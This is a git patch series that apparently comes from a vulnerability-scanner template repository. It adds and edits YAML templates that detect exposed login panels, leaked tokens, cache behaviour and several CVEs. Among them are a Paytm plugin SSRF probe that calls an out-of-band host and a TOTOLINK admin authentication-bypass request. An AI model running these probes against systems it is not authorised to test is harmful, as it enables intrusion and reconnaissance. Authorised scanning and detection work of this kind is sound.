Loxone-Login.yaml --- Loxone-Login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index a384eca38b..11b6e87815 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -1,7 +1,7 @@ -id: loxone-login +id: loxone-panel info: - name: Loxone-Intercom-Video-Login + name: Loxone Intercom Video Login author: theabhinavgaur severity: info metadata: @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - Loxone Intercom Video + - "Loxone Intercom Video" - type: status status: From 11fdf5afd66003b461c6f7736f183b4d9ed66ffb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 21:52:45 +0530 Subject: [PATCH 0555/1133] Update and rename Loxone-Login.yaml to exposed-panels/loxone-panel.yaml --- Loxone-Login.yaml => exposed-panels/loxone-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Loxone-Login.yaml => exposed-panels/loxone-panel.yaml (100%) diff --git a/Loxone-Login.yaml b/exposed-panels/loxone-panel.yaml similarity index 100% rename from Loxone-Login.yaml rename to exposed-panels/loxone-panel.yaml From c8147e12e90512b315ca49f8bce8c84a5aaeb7a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 00:03:10 +0530 Subject: [PATCH 0556/1133] Update loxone-panel.yaml --- exposed-panels/loxone-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/loxone-panel.yaml b/exposed-panels/loxone-panel.yaml index 11b6e87815..a9d5534c63 100644 --- a/exposed-panels/loxone-panel.yaml +++ b/exposed-panels/loxone-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Loxone Intercom Video" - tags: panel,Loxone + tags: panel,loxone requests: - method: GET From d87d0392b9401dad66b8f5cf7c305767335a0fc2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 01:58:39 +0530 Subject: [PATCH 0557/1133] Create Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/Content-Central-Login.yaml diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml new file mode 100644 index 0000000000..15c349be0d --- /dev/null +++ b/exposed-panels/Content-Central-Login.yaml @@ -0,0 +1,25 @@ +id: Content-Central-Login + +info: + name: Content Central Login + author: theabhinavgaur + severity: info + tags: panel,Content Central + +requests: + - method: GET + path: + - "{{BaseURL}}/ContentCentral/login.aspx/" + - "{{BaseURL}}/login.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - Content Central Login + case-insensitive: true + + - type: status + status: + - 200 From fc88d461aff06d05258285920349f9dcfe5ceb0f Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:02:24 +0530 Subject: [PATCH 0558/1133] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 15c349be0d..9ea7b85888 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -4,6 +4,9 @@ info: name: Content Central Login author: theabhinavgaur severity: info + metdata: + verified: true + shodan-query: http.title:"Content Central Login tags: panel,Content Central requests: From f6e94cd7c4d325a606bdfea471c67db4248cfccb Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:03:26 +0530 Subject: [PATCH 0559/1133] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 9ea7b85888..9c0a3b1ffc 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -6,7 +6,7 @@ info: severity: info metdata: verified: true - shodan-query: http.title:"Content Central Login + shodan-query: http.title:"Content Central Login" tags: panel,Content Central requests: From 0c7c2e2b06ec92112e5201e0aa8bceec9ef492e9 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:08:58 +0530 Subject: [PATCH 0560/1133] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 9c0a3b1ffc..a97ab10a7d 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -4,7 +4,7 @@ info: name: Content Central Login author: theabhinavgaur severity: info - metdata: + metadata: verified: true shodan-query: http.title:"Content Central Login" tags: panel,Content Central From 8e87a20c4496166e02632c327fcbdea57d330be2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:13:22 +0530 Subject: [PATCH 0561/1133] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index a97ab10a7d..15c349be0d 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -4,9 +4,6 @@ info: name: Content Central Login author: theabhinavgaur severity: info - metadata: - verified: true - shodan-query: http.title:"Content Central Login" tags: panel,Content Central requests: From 3b96837b3ab6268ee29c5848cd1b8b1732c4a622 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:22:04 +0530 Subject: [PATCH 0562/1133] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 15c349be0d..1ac37a23ac 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -1,16 +1,19 @@ -id: Content-Central-Login +id: content-central-login info: - name: Content Central Login + name: Content Central Login Panel author: theabhinavgaur severity: info - tags: panel,Content Central + metadata: + verified: true + shodan-query: http.title:"Content Central Login" + tags: panel,content-central requests: - method: GET path: - - "{{BaseURL}}/ContentCentral/login.aspx/" - "{{BaseURL}}/login.aspx" + - "{{BaseURL}}/ContentCentral/login.aspx/" matchers-condition: and matchers: @@ -18,7 +21,6 @@ requests: part: body words: - Content Central Login - case-insensitive: true - type: status status: From a9ac67cc9ccea3480166f2297b3f88b451333243 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:24:25 +0530 Subject: [PATCH 0563/1133] Update and rename Content-Central-Login.yaml to content-central-login.yaml --- .../{Content-Central-Login.yaml => content-central-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{Content-Central-Login.yaml => content-central-login.yaml} (100%) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/content-central-login.yaml similarity index 100% rename from exposed-panels/Content-Central-Login.yaml rename to exposed-panels/content-central-login.yaml From 701aabe2850de5de8820895ed3b361d0e231c0bf Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:30:27 +0530 Subject: [PATCH 0564/1133] Create n-central-login --- exposed-panels/n-central-login | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/n-central-login diff --git a/exposed-panels/n-central-login b/exposed-panels/n-central-login new file mode 100644 index 0000000000..d9cd92e4be --- /dev/null +++ b/exposed-panels/n-central-login @@ -0,0 +1,26 @@ +id: n-central-login + +info: + name: N-central Login + author: theabhinavgaur + severity: info + metadata: + verified: true + shodan-query: http.title:"N-central Login" + tags: panel,n-central + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ncentralVersion" + + - type: status + status: + - 200 From d311e42b2392f0aee8d17786b6d47c6102f20ecf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:41:53 +0530 Subject: [PATCH 0565/1133] Update zeplin-access-token.yaml --- exposures/tokens/zeplin/zeplin-access-token.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/tokens/zeplin/zeplin-access-token.yaml b/exposures/tokens/zeplin/zeplin-access-token.yaml index 6836f13fa2..ac3ec240b4 100644 --- a/exposures/tokens/zeplin/zeplin-access-token.yaml +++ b/exposures/tokens/zeplin/zeplin-access-token.yaml @@ -12,6 +12,7 @@ requests: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body From 1d3d1ad76e2223f46381b5e78c56f37b8651d59c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 10:50:30 +0530 Subject: [PATCH 0568/1133] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 16 +--------------- 1 file changed, 1 insertion(+), 15 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 0a5fa0a1c7..9212c3fa28 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -17,13 +17,11 @@ requests: - "{{RootURL}}/gpc.json" stop-at-first-match: true - host-redirects: true - max-redirects: 2 matchers-condition: and matchers: - type: word words: - - "gpc" + - '"gpc"' - type: status status: @@ -34,18 +32,6 @@ requests: - "len(body) <= 1024 && len(body) > 0" extractors: - - type: json - part: body - name: gpc-value - json: - - ".gpc" - - - type: json - part: body - name: gpc-last-update - json: - - ".lastUpdate?" - - type: json part: body name: gpc-version From 99e20791ea40d75d2fa68e558b3d0685b32bafb1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 10:57:29 +0530 Subject: [PATCH 0569/1133] Update sony-bravia-disclosure.yaml --- misconfiguration/sony-bravia-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/sony-bravia-disclosure.yaml b/misconfiguration/sony-bravia-disclosure.yaml index 99fe66474a..943b241d61 100644 --- a/misconfiguration/sony-bravia-disclosure.yaml +++ b/misconfiguration/sony-bravia-disclosure.yaml @@ -3,13 +3,13 @@ id: sony-bravia-disclosure info: name: Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure author: geeknik - severity: medium + severity: low description: | The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt - tags: sony,unauth,disclosure + tags: misconfig,sony,unauth,exposure requests: - method: GET From cacf0ef565bad8c4dcf33f7534872874b52db682 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:03:37 +0530 Subject: [PATCH 0570/1133] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 3c769f6ce8..43f0522be6 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,7 +1,7 @@ id: amazon-ec2-ssrf info: - name: Amazon EC2 SSRF + name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: @@ -9,6 +9,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: + verified: true shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon From 916d86ecb5fbc88dc0015240c21dcbc20f055328 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:06:01 +0530 Subject: [PATCH 0571/1133] Update digital-ocean-ssrf.yaml --- vulnerabilities/other/digital-ocean-ssrf.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/digital-ocean-ssrf.yaml b/vulnerabilities/other/digital-ocean-ssrf.yaml index 0f806ae067..17d33e6e1f 100644 --- a/vulnerabilities/other/digital-ocean-ssrf.yaml +++ b/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -1,14 +1,14 @@ id: digital-ocean-ssrf info: - name: Digital Ocean SSRF + name: Digital Ocean - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - + tags: digitalocean,ssrf requests: - raw: From f3f0c9073a1a43594d3a4fae6fcb907097527bf8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:29:08 +0530 Subject: [PATCH 0574/1133] Update zenscrape-api-key.yaml --- exposures/tokens/zenserp/zenscrape-api-key.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposures/tokens/zenserp/zenscrape-api-key.yaml b/exposures/tokens/zenserp/zenscrape-api-key.yaml index d53bccd3fb..feb4897a86 100644 --- a/exposures/tokens/zenserp/zenscrape-api-key.yaml +++ b/exposures/tokens/zenserp/zenscrape-api-key.yaml @@ -11,6 +11,13 @@ requests: - method: GET path: - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "zenscrape" + extractors: - type: regex part: body From 0c1dd5604eb13d3f91b0857e6edea9f6a0d61fc8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:31:15 +0530 Subject: [PATCH 0575/1133] Update zenserp-api-key.yaml --- exposures/tokens/zenserp/zenserp-api-key.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposures/tokens/zenserp/zenserp-api-key.yaml b/exposures/tokens/zenserp/zenserp-api-key.yaml index f851df7bfb..fa3e170f0f 100644 --- a/exposures/tokens/zenserp/zenserp-api-key.yaml +++ b/exposures/tokens/zenserp/zenserp-api-key.yaml @@ -11,6 +11,13 @@ requests: - method: GET path: - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "zenserp" + extractors: - type: regex part: body From 626c2da9d8c33d208b26f0ac3750bce0d3d855e5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:33:01 +0530 Subject: [PATCH 0576/1133] Update zerobounce-api-token.yaml --- exposures/tokens/zerobounce/zerobounce-api-token.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/tokens/zerobounce/zerobounce-api-token.yaml b/exposures/tokens/zerobounce/zerobounce-api-token.yaml index 0b2dc58a9d..d0d78ea99b 100644 --- a/exposures/tokens/zerobounce/zerobounce-api-token.yaml +++ b/exposures/tokens/zerobounce/zerobounce-api-token.yaml @@ -13,6 +13,7 @@ requests: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body From 8764bc6d05040a9e1f1b94a8570f12958d2f511f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:41:04 +0530 Subject: [PATCH 0577/1133] Delete zonkafeedback-api-token.yaml --- .../zonkafeedback-api-token.yaml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml diff --git a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml deleted file mode 100644 index ff6d60e682..0000000000 --- a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: zonkafeedback-api-token - -info: - name: Zonkafeedback Api Token - author: ritikchaddha - severity: info - reference: - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zonkafeedback/zonkafeedback.go - - https://apidocs.zonkafeedback.com - tags: exposure,token,zonkafeedback,zonka - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - '([A-Za-z0-9]{36})' From 5cefcb14e2c56aa011fc37ef4ad122cceb4da54c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:41:23 +0530 Subject: [PATCH 0578/1133] Delete zipcodeapi-token.yaml --- .../tokens/zipcodeapi/zipcodeapi-token.yaml | 20 ------------------- 1 file changed, 20 deletions(-) delete mode 100644 exposures/tokens/zipcodeapi/zipcodeapi-token.yaml diff --git a/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml b/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml deleted file mode 100644 index eb48e32fda..0000000000 --- a/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: zipcodeapi-token - -info: - name: Zipcodeapi Token - author: ritikchaddha - severity: info - reference: - - http://www.zipcodeapi.com/API - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zipcodeapi/zipcodeapi.go - tags: exposure,token,zipcodeapi,api - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - '([a-zA-Z0-9]{64})' From afa5f961143766e7e0c854b136eeb46422ef08c4 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 22 Dec 2022 15:47:57 +0530 Subject: [PATCH 0580/1133] Added template for CVE-2022-45362 --- cves/2022/CVE-2022-45362.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2022/CVE-2022-45362.yaml diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml new file mode 100644 index 0000000000..421b0ed02e --- /dev/null +++ b/cves/2022/CVE-2022-45362.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-45362 + +info: + name: Paytm Payment Gateway Plugin <= 2.7.0 Server Side Request Forgery (SSRF) + author: theamanrawat + severity: high + description: | + Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information. + reference: + - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability + - https://wordpress.org/plugins/paytm-payments/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-45362 + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth + +requests: + - raw: + - | + GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 200 \ No newline at end of file From ff6df80893208a713bbe3908dcd746641820a56e Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 22 Dec 2022 15:50:55 +0530 Subject: [PATCH 0581/1133] Updated --- cves/2022/CVE-2022-45362.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml index 421b0ed02e..e0c060bfa8 100644 --- a/cves/2022/CVE-2022-45362.yaml +++ b/cves/2022/CVE-2022-45362.yaml @@ -10,6 +10,10 @@ info: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45362 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2022-45362 tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth requests: From 7369c8c9ab4f390e62d8691e229d7719e04a7835 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 16:20:09 +0530 Subject: [PATCH 0582/1133] added missing parameters --- cves/2021/CVE-2021-42887.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml index 5ec841b5e3..de4052bfae 100644 --- a/cves/2021/CVE-2021-42887.yaml +++ b/cves/2021/CVE-2021-42887.yaml @@ -19,7 +19,7 @@ info: requests: - raw: - | - GET /formLoginAuth.htm?authCode=1&action=login HTTP/1.1 + GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1 Host: {{Hostname}} matchers-condition: and From a139f0077c29b0b39d7de8314d0ead816ab17d0f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 16:28:41 +0530 Subject: [PATCH 0583/1133] Update CVE-2021-42887.yaml --- cves/2021/CVE-2021-42887.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml index de4052bfae..112703073e 100644 --- a/cves/2021/CVE-2021-42887.yaml +++ b/cves/2021/CVE-2021-42887.yaml @@ -14,10 +14,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 + metadata: + shodan-query: title:"TOTOLINK" tags: totolink,auth-bypass,cve,cve2021,router requests: - raw: + - | + GET /login.htm HTTP/1.1 + Host: {{Hostname}} + - | GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1 Host: {{Hostname}} @@ -25,12 +31,15 @@ requests: matchers-condition: and matchers: - type: word + part: body_1 + words: + - "TOTOLINK"" + + - type: word + part: header_2 words: - "Set-Cookie: SESSION_ID=" - part: header - type: status status: - 302 - -# Enhanced by mp on 2022/11/06 From b774c133ad4f5650e1729ec540216167759e5fb3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 16:31:06 +0530 Subject: [PATCH 0584/1133] Update CVE-2021-42887.yaml --- cves/2021/CVE-2021-42887.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml index 112703073e..4e297d02a5 100644 --- a/cves/2021/CVE-2021-42887.yaml +++ b/cves/2021/CVE-2021-42887.yaml @@ -33,7 +33,7 @@ requests: - type: word part: body_1 words: - - "TOTOLINK"" + - "TOTOLINK" - type: word part: header_2 From 294c46dc65fe7b544e72f45f879c40bde910fda7 Mon Sep 17 00:00:00 2001 From: nybble04 Date: Thu, 22 Dec 2022 16:09:48 +0400 Subject: [PATCH 0585/1133] Add Akamai cache detection template --- technologies/akamai-cache-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/akamai-cache-detect.yaml diff --git a/technologies/akamai-cache-detect.yaml b/technologies/akamai-cache-detect.yaml new file mode 100644 index 0000000000..461bd443b7 --- /dev/null +++ b/technologies/akamai-cache-detect.yaml @@ -0,0 +1,26 @@ +id: akamai-cache-detect + +info: + name: Akamai Cache Detection Template + author: nybble04 + severity: info + description: Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. + reference: + - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US + - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + metadata: + verified: true + tags: cache,akamai + +requests: + - method: HEAD + path: + - "{{BaseURL}}" + headers: + Pragma: akamai-x-cache-on + + matchers: + - type: regex + part: header + regex: + - '(?:TCP_HIT|TCP_MISS).*deploy\.akamaitechnologies\.com' From 20318349cb3c5aca91c07a1fe1608c362bc1be2d Mon Sep 17 00:00:00 2001 From: nybble04 <36155956+nybble04@users.noreply.github.com> Date: Thu, 22 Dec 2022 17:06:03 +0400 Subject: [PATCH 0586/1133] Remove trailing space --- technologies/akamai-cache-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/akamai-cache-detect.yaml b/technologies/akamai-cache-detect.yaml index 461bd443b7..9cba06aad2 100644 --- a/technologies/akamai-cache-detect.yaml +++ b/technologies/akamai-cache-detect.yaml @@ -14,7 +14,7 @@ info: requests: - method: HEAD - path: + path: - "{{BaseURL}}" headers: Pragma: akamai-x-cache-on From 1998c3be38adcb460fbff1f4d3524c542e958493 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 22:33:23 +0530 Subject: [PATCH 0587/1133] added tags and formatting changes --- technologies/akamai-cache-detect.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/technologies/akamai-cache-detect.yaml b/technologies/akamai-cache-detect.yaml index 9cba06aad2..d79c43f010 100644 --- a/technologies/akamai-cache-detect.yaml +++ b/technologies/akamai-cache-detect.yaml @@ -1,16 +1,17 @@ id: akamai-cache-detect info: - name: Akamai Cache Detection Template + name: Akamai Cache Detection author: nybble04 severity: info - description: Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. + description: | + Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. reference: - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ metadata: verified: true - tags: cache,akamai + tags: cache,akamai,tech requests: - method: HEAD From b2915ffe80968fc8e599b82ae8219e804d10c0d0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 22 Dec 2022 23:50:45 +0530 Subject: [PATCH 0588/1133] minor-update --- cves/2020/CVE-2020-11547.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index eac278a7a9..dc8bc84b7d 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -5,6 +5,9 @@ info: author: x6263 severity: medium description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request. + metadata: + verified: true + shodan-query: title:"prtg" reference: - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 @@ -21,6 +24,7 @@ requests: path: - "{{BaseURL}}/public/login.htm?type=probes" - "{{BaseURL}}/public/login.htm?type=requests" + - "{{BaseURL}}/public/login.htm?type=treestat" req-condition: true matchers-condition: and @@ -33,6 +37,9 @@ requests: part: body words: - "prtg_network_monitor" + - "Probes" + - "Groups" + condition: or - type: status status: From c0080f72f2ebec70145e56c1178556de194a010d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 22 Dec 2022 23:52:47 +0530 Subject: [PATCH 0589/1133] Update CVE-2020-11547.yaml --- cves/2020/CVE-2020-11547.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index dc8bc84b7d..28c961b4b5 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -39,7 +39,7 @@ requests: - "prtg_network_monitor" - "Probes" - "Groups" - condition: or + condition: or - type: status status: From b0ca4271d7dff10107e748e40abf4ad40c671a44 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 23 Dec 2022 12:55:38 +0530 Subject: [PATCH 0590/1133] Create thinkphp6-lang-lfi.yaml --- .../thinkphp/thinkphp6-lang-lfi.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml diff --git a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml new file mode 100644 index 0000000000..3c666cbe70 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml @@ -0,0 +1,35 @@ +id: thinkphp6-lang-lfi + +info: + name: Thinkphp lang - LFI + author: kagamigawa + severity: high + description: | + Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to lfi. + reference: + - https://tttang.com/archive/1865/ + metadata: + verified: true + shodan-query: title:"Thinkphp" + fofa-query: 